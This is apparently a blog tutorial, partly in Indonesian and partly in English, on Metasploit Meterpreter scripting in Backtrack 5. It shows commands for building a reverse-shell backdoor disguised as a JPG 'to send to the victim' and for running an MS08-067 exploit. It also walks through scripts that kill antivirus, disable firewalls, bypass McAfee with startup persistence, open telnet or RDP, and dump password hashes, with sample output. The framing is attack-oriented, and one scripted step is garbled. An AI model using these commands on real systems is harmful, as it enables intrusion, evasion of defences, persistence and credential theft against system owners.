Metasploit Meterpreter Scripting Backtrack 5 Tutorial


Keamanan informasi adalah bidang yang luas dan melibatkan pengujian penetrasi dan komputer forensik juga, ada begitu banyak alat tersedia untuk melakukan pengujian penetrasi pada target, Metasploit adalah salah satu alat yang terbaik di antara mereka. Meterpreter adalah fitur kuat dari metasploit yang menggunakan injeksi DLL untuk berkomunikasi melalui soket. Meterpreter bekerja pada sisi-klien dengan menyediakan lingkungan yang kuat untuk berkomunikasi, untuk mentransfer file.


Sebuah sesi meterpreter dapat dibentuk setelah berhasil memanfaatkan tuan rumah. Script meterpreter tersedia pada database metasploit mengotomatisasi beberapa proses, seperti:

  • Capture the screen
  • Keylogging
  • File transfer
  • Service detection and more

Bahkan dengan script meterpreter yang tersedia, Anda bebas untuk menulis dan untuk membuat script sendiri yang paling cocok untuk pekerjaan Anda. Beberapa aspek penting tentang script meterpreter akan menjadi:

  • Written in Ruby programming language
  • Located in the metasploit directory
  • Meterpreter scripts are creating everyday by different authors click here to check the list.
  • Meterpreter scripts are very helpful to automate the process after compromising the host
  • Meterpreter scripts are based on API and you can get more information here.
Ada script meterpreter begitu banyak yang tersedia secara publik untuk Anda gunakan, tetapi jika Anda ingin membuat script meterpreter baru Anda sendiri dan untuk penggunaan umum, hal ini mudah bisa dilakukan. Yang perlu Anda lakukan adalah mengikuti beberapa aturan dan peraturan agar naskah Anda tidak bertentangan dengan variabel standar. Ruby bahasa pemrograman merupakan kebutuhan dasar untuk menulis naskah untuk meterpreter. Aturan penting lainnya untuk mengikuti adalah:

  • Always use description so that the others will understand it
  • Use local variable not global variable
  • Always provide help option for better usage
  • Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities
Mari kita perhatikan contoh: dalam skenario kita, kita perlu membuat file yang terinfeksi (backdoor) sehingga kita dapat mengirim kepada korban. Metasploit tidak perlu bahwa masalah besar, Anda bahkan dapat membuat backdoor dengan menggunakan jalur cepat.

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}



As we have typed all the things in, we can automate the process by creating a new script:
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

The result is
the same. It is also possible to create a jpg file but that method is
fast. Since the time-consuming method is repeating the same step, why
not create a script for that to do all these jobs automatically? There
are different meterpreter scripts are available; just look at the
picture below.


This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:

root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc


Beyond this, if we use the manual technique to do then job, then we will need to define:
  • The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
  • We need to set the remote host manually
  • We need to set local host and port manually
After
the execution, the meterpreter session must be active if and only if
the operating system is vulnerable, such as in this case:


Now
in this meterpreter session, we are able to call different scripts. We
can also create our own script as well, as discussed above. Below, I
will show you some of the best meterpreter scripts. These are highly
useful in the process of penetration testing; however, developers are
refining these scripts daily, so be active in the community and on
different blogs and forums to keep yourself updated.

Screenspy Script


This is the basic script that will capture the screen of the victim’s
computer. All you need to do is type in “run screenspy.” To get help of
usage, just type in “run screenspy -h” on the meterpreter screen. After
the execution, Firefox will open with a picture of the victim’s computer
at that moment.

KillAv Script

Killav script
is a pretty famous script. As the name suggests, it will kill (close)
antivirus softwares, so if you don’t want that antivirus’ software to
disturb you, be sure to kill all of these antivirus softwares by using
this script:

meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >

Killav contains the information
on most of the better known anti-virus’s, but if there is a new
anti-virus, then you will need to edit this script for the best
performance. As before with the script file, we can find the famous
anti-virus exe name:
  • winppr32.exe
  • winrecon.exe
  • winservn.exe
  • winssk32.exe
  • winstart.exe
  • winstart001.exe
  • wintsk32.exe
  • winupdate.exe
  • wkufind.exe
  • wnad.exe
  • wnt.exe
  • wradmin.exe
  • wrctrl.exe
  • wsbgate.exe
  • wupdater.exe
  • wupdt.exe
  • wyvernworksfirewall.exe
  • xpf202en.exe
  • zapro.exe
  • zapsetup3001.exe
  • zatutor.exe
  • zonalm2601.exe
  • zonealarm.exe

Getcountermeasure Script


Killav is a power script and it can kill a lot of different
anti-virus’s, but the problem is that when you implement killav, windows
may show some types of errors and other alerts, not to mention
firewalls. This is remedied by a wonderful script called
Getcountermeasure:

meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies

OPTIONS:

-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.


Just imagine how powerful this script is! It has an ability to fight
against Firewall, Anti-virus, IPS and even third party firewall that are
so very common nowadays. It is really better than Killav. To use it:

meterpreter > run getcountermeasure -d 

[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...

Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.


Gettelnet script

Telnet
is one of the most famous services on the windows operating system. It
will allow a remote connection, so if you want to open telnet on the
victim’s computer for future use, then it is a good script to use.
However, as an advance we can use SSH service for remote connection. We
can also install netcat as a backdoor on a compromised host for future
connections. Use this command to get more help
  meterpreter > gettelnet -h


There are a lot of different scripts are available but here we will
discuss only the most important ones. These will help you to understand
the network as well as help you for future connections:
Net Enum- Network Enumeration Script
Netenum is a network enumeration script that is a wonderful script for:
  • Domain Name for DNS Forward Lookup
  • To Perform DNS Forward Lookup on host list and domain
  • The target address range or CIDR identifier
  • To Perform DNS lookup of MX and NS records for a domain
  • To Perform Service Record DNS lookup for a domain
  • To Perform Ping Sweep on IP Range


Checkvm- Check Virtual Machine

Virtual
machines are now an important part of enterprise network and most of
the large (and even small) networks are using them. Checkvm is a script
that will let you monitor the status of the victim, whether on virtual
machine or not. It will also let you see the type of virtual machine.
Here is the output of this case:

 meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >

Virus Scan Bypass

Bypasses
Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP
folder, adds it to exclusion list and sets it to run at startup. Though
we have discussed two scripts that kill anti-virus protections, it is
good to run different scripts to verify your attack.
 
  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui

If
you want a graphical user interface of the victim’s computer, then you
need to open a service called RDP (remote desktop protocol):
  meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode

Hashdump


Last but not the least: I really don’t want to end this article without
sharing hashdump, in case you want to secure password hashes from the
victim for future use. In some cases, these hashes works on other
platforms:

 meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::

If you have some other wonderful scripts, please share with in the comments!


Category Article

What's on Your Mind...